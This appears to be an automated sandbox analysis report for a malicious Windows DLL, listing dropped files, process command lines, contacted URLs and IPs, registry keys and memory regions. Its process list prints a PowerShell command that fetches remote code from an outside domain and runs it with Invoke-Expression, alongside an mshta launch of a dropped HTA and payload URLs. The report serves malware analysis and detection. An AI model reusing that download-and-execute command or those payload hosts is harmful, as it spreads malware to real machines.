Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
UPazTgVGA7.dll
|
PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
|
initial sample
|
 |
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_UPa_d9f780498594a535678cbf25bbc693cb18cc1f55_4443b3a3_2f674f4a-1c41-4588-8605-c89ae3137839\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_UPa_d9f780498594a535678cbf25bbc693cb18cc1f55_4443b3a3_8aa9a7b9-25be-4214-91fe-7d01e7ec8999\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_UPa_d9f780498594a535678cbf25bbc693cb18cc1f55_4443b3a3_b4fa3f81-04cc-435e-81b7-4001bfc48870\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER162D.tmp.dmp
|
Mini DuMP crash report, 14 streams, Wed May 22 16:06:59 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER16DA.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER171A.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD46.tmp.dmp
|
Mini DuMP crash report, 14 streams, Wed May 22 16:06:53 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD66.tmp.dmp
|
Mini DuMP crash report, 14 streams, Wed May 22 16:06:53 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE13.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE22.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE52.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE71.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\Public\example.hta
|
HTML document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\d[1].txt
|
HTML document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1susrilc.eou.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwdzc31e.iyr.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_emjfwbke.w5l.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nzni3sjp.fxh.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
There are 12 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe C:\Users\user\Desktop\UPazTgVGA7.dll,hash
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",#1
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe C:\Users\user\Desktop\UPazTgVGA7.dll,xlAutoOpen
|
|
|
|
C:\Windows\SysWOW64\mshta.exe
|
"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
mshta
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",hash
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",xlAutoOpen
|
|
|
|
C:\Windows\SysWOW64\mshta.exe
|
"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
mshta
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
|
|
|
|
C:\Windows\System32\loaddll64.exe
|
loaddll64.exe "C:\Users\user\Desktop\UPazTgVGA7.dll"
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
cmd.exe /C rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",#1
|
||
|
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 2668 -s 424
|
||
|
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 3504 -s 244
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 7376 -s 424
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 7 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt
|
194.124.213.167
|
|
|
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtg
|
unknown
|
||
|
http://iapartmentlistings.com/tykhwuxk
|
91.222.173.38
|
||
|
http://upx.sf.net
|
unknown
|
||
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt?M;(
|
unknown
|
||
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtf
|
unknown
|
||
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtLMEM
|
unknown
|
||
|
https://www.siguefutbol.com/
|
unknown
|
||
|
https://www.siguefutbol.com/f=
|
unknown
|
||
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txth
|
unknown
|
||
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtmshtaopen72be476187889df5a41b67e836
|
unknown
|
There are 1 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
iapartmentlistings.com
|
91.222.173.38
|
|
|
|
siguefutbol.com
|
194.124.213.167
|
|
|
|
www.siguefutbol.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
194.124.213.167
|
siguefutbol.com
|
unknown
|
|
|
|
91.222.173.38
|
iapartmentlistings.com
|
Ukraine
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
\REGISTRY\A\{f3f71ae8-e5a7-495f-a13b-a81a8683fa50}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
ProgramId
|
||
|
\REGISTRY\A\{f3f71ae8-e5a7-495f-a13b-a81a8683fa50}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
FileId
|
||
|
\REGISTRY\A\{f3f71ae8-e5a7-495f-a13b-a81a8683fa50}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
LowerCaseLongPath
|
||
|
\REGISTRY\A\{f3f71ae8-e5a7-495f-a13b-a81a8683fa50}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
LongPathHash
|
||
|
\REGISTRY\A\{f3f71ae8-e5a7-495f-a13b-a81a8683fa50}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Name
|
||
|
\REGISTRY\A\{f3f71ae8-e5a7-495f-a13b-a81a8683fa50}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
OriginalFileName
|
||
|
\REGISTRY\A\{f3f71ae8-e5a7-495f-a13b-a81a8683fa50}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Publisher
|
||
|
\REGISTRY\A\{f3f71ae8-e5a7-495f-a13b-a81a8683fa50}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Version
|
||
|
\REGISTRY\A\{f3f71ae8-e5a7-495f-a13b-a81a8683fa50}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
BinFileVersion
|
||
|
\REGISTRY\A\{f3f71ae8-e5a7-495f-a13b-a81a8683fa50}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
BinaryType
|
||
|
\REGISTRY\A\{f3f71ae8-e5a7-495f-a13b-a81a8683fa50}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
ProductName
|
||
|
\REGISTRY\A\{f3f71ae8-e5a7-495f-a13b-a81a8683fa50}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
ProductVersion
|
||
|
\REGISTRY\A\{f3f71ae8-e5a7-495f-a13b-a81a8683fa50}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
LinkDate
|
||
|
\REGISTRY\A\{f3f71ae8-e5a7-495f-a13b-a81a8683fa50}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
BinProductVersion
|
||
|
\REGISTRY\A\{f3f71ae8-e5a7-495f-a13b-a81a8683fa50}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
AppxPackageFullName
|
||
|
\REGISTRY\A\{f3f71ae8-e5a7-495f-a13b-a81a8683fa50}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
AppxPackageRelativeId
|
||
|
\REGISTRY\A\{f3f71ae8-e5a7-495f-a13b-a81a8683fa50}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Size
|
||
|
\REGISTRY\A\{f3f71ae8-e5a7-495f-a13b-a81a8683fa50}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Language
|
||
|
\REGISTRY\A\{f3f71ae8-e5a7-495f-a13b-a81a8683fa50}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
IsOsComponent
|
||
|
\REGISTRY\A\{f3f71ae8-e5a7-495f-a13b-a81a8683fa50}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Usn
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\SysWOW64\mshta.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\SysWOW64\mshta.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 28 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1B9DE888000
|
heap
|
page read and write
|
||
|
897000
|
heap
|
page read and write
|
||
|
8A5000
|
heap
|
page read and write
|
||
|
38C149C000
|
stack
|
page read and write
|
||
|
33FB000
|
heap
|
page read and write
|
||
|
6717000
|
heap
|
page read and write
|
||
|
1B9DE8EE000
|
heap
|
page read and write
|
||
|
7FF8BFAB9000
|
unkown
|
page read and write
|
||
|
6715000
|
heap
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
2AC3A894000
|
heap
|
page read and write
|
||
|
3441000
|
heap
|
page read and write
|
||
|
2B053B50000
|
heap
|
page read and write
|
||
|
33F2000
|
heap
|
page read and write
|
||
|
2AC3A7C0000
|
heap
|
page read and write
|
||
|
8D4000
|
heap
|
page read and write
|
||
|
2B72E2A8000
|
heap
|
page read and write
|
||
|
2AC3C6B0000
|
remote allocation
|
page read and write
|
||
|
F37877F000
|
stack
|
page read and write
|
||
|
8ED000
|
heap
|
page read and write
|
||
|
3350000
|
heap
|
page read and write
|
||
|
5060000
|
trusted library allocation
|
page read and write
|
||
|
340F000
|
heap
|
page read and write
|
||
|
2B053B50000
|
heap
|
page read and write
|
||
|
3421000
|
heap
|
page read and write
|
||
|
7FF8BFAB4000
|
unkown
|
page readonly
|
||
|
8F1000
|
heap
|
page read and write
|
||
|
3DBA77F000
|
stack
|
page read and write
|
||
|
2CB0000
|
heap
|
page read and write
|
||
|
16103340000
|
heap
|
page read and write
|
||
|
2AC3A84F000
|
heap
|
page read and write
|
||
|
5B0E000
|
stack
|
page read and write
|
||
|
5BB4000
|
heap
|
page read and write
|
||
|
5C8E000
|
stack
|
page read and write
|
||
|
2C70000
|
heap
|
page read and write
|
||
|
8DF000
|
heap
|
page read and write
|
||
|
4B70000
|
heap
|
page read and write
|
||
|
33A4000
|
heap
|
page read and write
|
||
|
33E2000
|
heap
|
page read and write
|
||
|
354F000
|
stack
|
page read and write
|
||
|
97F2000
|
trusted library allocation
|
page read and write
|
||
|
671B000
|
heap
|
page read and write
|
||
|
993000
|
heap
|
page read and write
|
||
|
3573000
|
heap
|
page read and write
|
||
|
255B7977000
|
heap
|
page read and write
|
||
|
9C44000
|
heap
|
page read and write
|
||
|
A22C000
|
stack
|
page read and write
|
||
|
F7E15AF000
|
stack
|
page read and write
|
||
|
3270000
|
heap
|
page read and write
|
||
|
8DC000
|
heap
|
page read and write
|
||
|
33AD000
|
heap
|
page read and write
|
||
|
868000
|
heap
|
page read and write
|
||
|
F7E152E000
|
stack
|
page read and write
|
||
|
89E000
|
heap
|
page read and write
|
||
|
2ABF000
|
stack
|
page read and write
|
||
|
4B90000
|
heap
|
page read and write
|
||
|
330E000
|
stack
|
page read and write
|
||
|
5BE3000
|
heap
|
page read and write
|
||
|
5E10000
|
trusted library allocation
|
page read and write
|
||
|
89A000
|
heap
|
page read and write
|
||
|
2AC3A82E000
|
heap
|
page read and write
|
||
|
33D1000
|
heap
|
page read and write
|
||
|
5BDC000
|
heap
|
page read and write
|
||
|
780000
|
heap
|
page read and write
|
||
|
F3785FA000
|
stack
|
page read and write
|
||
|
8DF000
|
heap
|
page read and write
|
||
|
866000
|
heap
|
page read and write
|
||
|
9D5E000
|
stack
|
page read and write
|
||
|
51C0000
|
heap
|
page read and write
|
||
|
7FF8BFAB0000
|
unkown
|
page readonly
|
||
|
255B7B30000
|
heap
|
page read and write
|
||
|
8AF000
|
heap
|
page read and write
|
||
|
4EDB000
|
stack
|
page read and write
|
||
|
2B053940000
|
heap
|
page read and write
|
||
|
88A000
|
heap
|
page read and write
|
||
|
909000
|
heap
|
page read and write
|
||
|
33F3000
|
heap
|
page read and write
|
||
|
88A000
|
heap
|
page read and write
|
||
|
9C23000
|
heap
|
page read and write
|
||
|
90C000
|
heap
|
page read and write
|
||
|
2AC3A7C8000
|
heap
|
page read and write
|
||
|
A4CF000
|
heap
|
page read and write
|
||
|
842000
|
heap
|
page read and write
|
||
|
3421000
|
heap
|
page read and write
|
||
|
F3786FE000
|
stack
|
page read and write
|
||
|
9C81000
|
heap
|
page read and write
|
||
|
7FF8BFAB9000
|
unkown
|
page read and write
|
||
|
16103000000
|
heap
|
page read and write
|
||
|
6715000
|
heap
|
page read and write
|
||
|
33FB000
|
heap
|
page read and write
|
||
|
9EF4000
|
trusted library allocation
|
page read and write
|
||
|
85D000
|
heap
|
page read and write
|
||
|
255B7B95000
|
heap
|
page read and write
|
||
|
671B000
|
heap
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
33DC000
|
heap
|
page read and write
|
||
|
9E5F000
|
stack
|
page read and write
|
||
|
88A000
|
heap
|
page read and write
|
||
|
3418000
|
heap
|
page read and write
|
||
|
9C21000
|
heap
|
page read and write
|
||
|
907000
|
heap
|
page read and write
|
||
|
33F8000
|
heap
|
page read and write
|
||
|
3415000
|
heap
|
page read and write
|
||
|
B829AFE000
|
stack
|
page read and write
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
16103008000
|
heap
|
page read and write
|
||
|
3440000
|
heap
|
page read and write
|
||
|
47AF000
|
heap
|
page read and write
|
||
|
F3784FE000
|
stack
|
page read and write
|
||
|
303A000
|
stack
|
page read and write
|
||
|
33E3000
|
heap
|
page read and write
|
||
|
2B72FD70000
|
heap
|
page read and write
|
||
|
8DC000
|
heap
|
page read and write
|
||
|
896000
|
heap
|
page read and write
|
||
|
35D7000
|
heap
|
page read and write
|
||
|
33F3000
|
heap
|
page read and write
|
||
|
33F8000
|
heap
|
page read and write
|
||
|
9C35000
|
heap
|
page read and write
|
||
|
2CBA000
|
heap
|
page read and write
|
||
|
343D000
|
heap
|
page read and write
|
||
|
5BDB000
|
heap
|
page read and write
|
||
|
625000
|
heap
|
page read and write
|
||
|
2B72E280000
|
heap
|
page read and write
|
||
|
89B000
|
heap
|
page read and write
|
||
|
990000
|
heap
|
page read and write
|
||
|
33AA000
|
heap
|
page read and write
|
||
|
66F6000
|
heap
|
page read and write
|
||
|
8C0000
|
heap
|
page read and write
|
||
|
2AC3A7A0000
|
heap
|
page read and write
|
||
|
950000
|
heap
|
page read and write
|
||
|
255B7910000
|
heap
|
page read and write
|
||
|
3E7000
|
stack
|
page read and write
|
||
|
5A0C000
|
stack
|
page read and write
|
||
|
66D1000
|
heap
|
page read and write
|
||
|
33FB000
|
heap
|
page read and write
|
||
|
F7E14AC000
|
stack
|
page read and write
|
||
|
5BE3000
|
heap
|
page read and write
|
||
|
8C0000
|
heap
|
page read and write
|
||
|
33FB000
|
heap
|
page read and write
|
||
|
F37887B000
|
stack
|
page read and write
|
||
|
33F6000
|
heap
|
page read and write
|
||
|
16103110000
|
heap
|
page read and write
|
||
|
B3595FE000
|
stack
|
page read and write
|
||
|
2B053B30000
|
heap
|
page read and write
|
||
|
85D000
|
heap
|
page read and write
|
||
|
2CB6000
|
heap
|
page read and write
|
||
|
B3594FC000
|
stack
|
page read and write
|
||
|
8A8000
|
heap
|
page read and write
|
||
|
33EC000
|
heap
|
page read and write
|
||
|
9C20000
|
heap
|
page read and write
|
||
|
8FA000
|
heap
|
page read and write
|
||
|
818000
|
heap
|
page read and write
|
||
|
8DF000
|
heap
|
page read and write
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
671B000
|
heap
|
page read and write
|
||
|
88A000
|
heap
|
page read and write
|
||
|
33F2000
|
heap
|
page read and write
|
||
|
8CC000
|
heap
|
page read and write
|
||
|
2B72E180000
|
heap
|
page read and write
|
||
|
2B053BF0000
|
heap
|
page read and write
|
||
|
A37E000
|
stack
|
page read and write
|
||
|
620000
|
heap
|
page read and write
|
||
|
5BEA000
|
heap
|
page read and write
|
||
|
90D000
|
heap
|
page read and write
|
||
|
2B72E455000
|
heap
|
page read and write
|
||
|
5BEA000
|
heap
|
page read and write
|
||
|
340F000
|
heap
|
page read and write
|
||
|
8ED000
|
heap
|
page read and write
|
||
|
3560000
|
trusted library allocation
|
page read and write
|
||
|
3DBA1E6000
|
stack
|
page read and write
|
||
|
340F000
|
heap
|
page read and write
|
||
|
3550000
|
trusted library allocation
|
page read and write
|
||
|
8CC000
|
heap
|
page read and write
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
5BF0000
|
heap
|
page read and write
|
||
|
33E2000
|
heap
|
page read and write
|
||
|
340F000
|
heap
|
page read and write
|
||
|
2AC3A85F000
|
heap
|
page read and write
|
||
|
340A000
|
heap
|
page read and write
|
||
|
340F000
|
heap
|
page read and write
|
||
|
896000
|
heap
|
page read and write
|
||
|
33AA000
|
heap
|
page read and write
|
||
|
3427000
|
heap
|
page read and write
|
||
|
7FF8BFAB4000
|
unkown
|
page readonly
|
||
|
7FF8BFAB1000
|
unkown
|
page execute read
|
||
|
5BDB000
|
heap
|
page read and write
|
||
|
8DF000
|
heap
|
page read and write
|
||
|
5BC6000
|
heap
|
page read and write
|
||
|
1B9E0370000
|
heap
|
page read and write
|
||
|
5BEA000
|
heap
|
page read and write
|
||
|
670B000
|
heap
|
page read and write
|
||
|
90C000
|
heap
|
page read and write
|
||
|
3280000
|
heap
|
page read and write
|
||
|
868000
|
heap
|
page read and write
|
||
|
3DBA6FF000
|
stack
|
page read and write
|
||
|
3358000
|
heap
|
page read and write
|
||
|
89F000
|
heap
|
page read and write
|
||
|
51C6000
|
heap
|
page read and write
|
||
|
4FDF000
|
stack
|
page read and write
|
||
|
33D7000
|
heap
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
8F4000
|
heap
|
page read and write
|
||
|
5BA0000
|
heap
|
page read and write
|
||
|
340F000
|
heap
|
page read and write
|
||
|
3137000
|
stack
|
page read and write
|
||
|
33EB000
|
heap
|
page read and write
|
||
|
1B9DE96B000
|
heap
|
page read and write
|
||
|
B8297FC000
|
stack
|
page read and write
|
||
|
5BE5000
|
heap
|
page read and write
|
||
|
9C5D000
|
heap
|
page read and write
|
||
|
33ED000
|
heap
|
page read and write
|
||
|
7FF8BFAB0000
|
unkown
|
page readonly
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
8EA000
|
heap
|
page read and write
|
||
|
900000
|
heap
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
255B7B90000
|
heap
|
page read and write
|
||
|
340F000
|
heap
|
page read and write
|
||
|
8B5000
|
heap
|
page read and write
|
||
|
A95D000
|
stack
|
page read and write
|
||
|
3415000
|
heap
|
page read and write
|
||
|
77E000
|
stack
|
page read and write
|
||
|
A610000
|
trusted library allocation
|
page read and write
|
||
|
3577000
|
heap
|
page read and write
|
||
|
33D1000
|
heap
|
page read and write
|
||
|
33E2000
|
heap
|
page read and write
|
||
|
8F0000
|
heap
|
page read and write
|
||
|
255B797E000
|
heap
|
page read and write
|
||
|
3432000
|
heap
|
page read and write
|
||
|
5BDB000
|
heap
|
page read and write
|
||
|
670C000
|
heap
|
page read and write
|
||
|
F37857E000
|
stack
|
page read and write
|
||
|
7CD000
|
stack
|
page read and write
|
||
|
3285000
|
heap
|
page read and write
|
||
|
8ED000
|
heap
|
page read and write
|
||
|
339C000
|
heap
|
page read and write
|
||
|
33D7000
|
heap
|
page read and write
|
||
|
8DF000
|
heap
|
page read and write
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
7FF8BFAB1000
|
unkown
|
page execute read
|
||
|
336F000
|
heap
|
page read and write
|
||
|
A4A1000
|
heap
|
page read and write
|
||
|
8C0000
|
heap
|
page read and write
|
||
|
6715000
|
heap
|
page read and write
|
||
|
2B05394D000
|
heap
|
page read and write
|
||
|
51C4000
|
heap
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
2B053BD0000
|
heap
|
page read and write
|
||
|
A32C000
|
stack
|
page read and write
|
||
|
867000
|
heap
|
page read and write
|
||
|
3570000
|
heap
|
page read and write
|
||
|
5BE3000
|
heap
|
page read and write
|
||
|
2B053958000
|
heap
|
page read and write
|
||
|
2C90000
|
heap
|
page read and write
|
||
|
2B72E450000
|
heap
|
page read and write
|
||
|
8ED000
|
heap
|
page read and write
|
||
|
6715000
|
heap
|
page read and write
|
||
|
8ED000
|
heap
|
page read and write
|
||
|
1B9DE860000
|
heap
|
page read and write
|
||
|
9C37000
|
heap
|
page read and write
|
||
|
3444000
|
heap
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
2AC3AA00000
|
heap
|
page read and write
|
||
|
51CF000
|
heap
|
page read and write
|
||
|
5590000
|
heap
|
page read and write
|
||
|
F3781EE000
|
stack
|
page read and write
|
||
|
A6F0000
|
heap
|
page read and write
|
||
|
2AC3A770000
|
heap
|
page read and write
|
||
|
2B72E260000
|
heap
|
page read and write
|
||
|
1B9DE90D000
|
heap
|
page read and write
|
||
|
2B72E2A0000
|
heap
|
page read and write
|
||
|
3443000
|
heap
|
page read and write
|
||
|
2AC3C6B0000
|
remote allocation
|
page read and write
|
||
|
1B9DE880000
|
heap
|
page read and write
|
||
|
5B2F000
|
stack
|
page read and write
|
||
|
896000
|
heap
|
page read and write
|
||
|
47A4000
|
heap
|
page read and write
|
||
|
A4AB000
|
heap
|
page read and write
|
||
|
898000
|
heap
|
page read and write
|
||
|
3438000
|
heap
|
page read and write
|
||
|
8ED000
|
heap
|
page read and write
|
||
|
5C4F000
|
stack
|
page read and write
|
||
|
3580000
|
heap
|
page read and write
|
||
|
47A0000
|
heap
|
page read and write
|
||
|
2AC3AA90000
|
heap
|
page read and write
|
||
|
671B000
|
heap
|
page read and write
|
||
|
8B5000
|
heap
|
page read and write
|
||
|
1B9DEA70000
|
heap
|
page read and write
|
||
|
3414000
|
heap
|
page read and write
|
||
|
32CE000
|
stack
|
page read and write
|
||
|
8AE000
|
heap
|
page read and write
|
||
|
161031F0000
|
heap
|
page read and write
|
||
|
997000
|
heap
|
page read and write
|
||
|
35C0000
|
heap
|
page read and write
|
||
|
854000
|
heap
|
page read and write
|
||
|
33AC000
|
heap
|
page read and write
|
||
|
5A2E000
|
stack
|
page read and write
|
||
|
340F000
|
heap
|
page read and write
|
||
|
670B000
|
heap
|
page read and write
|
||
|
33F8000
|
heap
|
page read and write
|
||
|
9C37000
|
heap
|
page read and write
|
||
|
2EA000
|
stack
|
page read and write
|
||
|
3DBA47F000
|
stack
|
page read and write
|
||
|
16103210000
|
heap
|
page read and write
|
||
|
866000
|
heap
|
page read and write
|
||
|
33FB000
|
heap
|
page read and write
|
||
|
33D7000
|
heap
|
page read and write
|
||
|
33E5000
|
heap
|
page read and write
|
||
|
33FB000
|
heap
|
page read and write
|
||
|
A47F000
|
stack
|
page read and write
|
||
|
33F6000
|
heap
|
page read and write
|
||
|
33F6000
|
heap
|
page read and write
|
||
|
5390000
|
heap
|
page read and write
|
||
|
896000
|
heap
|
page read and write
|
||
|
7FF8BFAB4000
|
unkown
|
page readonly
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
851000
|
heap
|
page read and write
|
||
|
5BDB000
|
heap
|
page read and write
|
||
|
55B0000
|
heap
|
page read and write
|
||
|
33F6000
|
heap
|
page read and write
|
||
|
2AC3C820000
|
heap
|
page read and write
|
||
|
339C000
|
heap
|
page read and write
|
||
|
2B053949000
|
heap
|
page read and write
|
||
|
3DBA57F000
|
stack
|
page read and write
|
||
|
A487000
|
heap
|
page read and write
|
||
|
343C000
|
heap
|
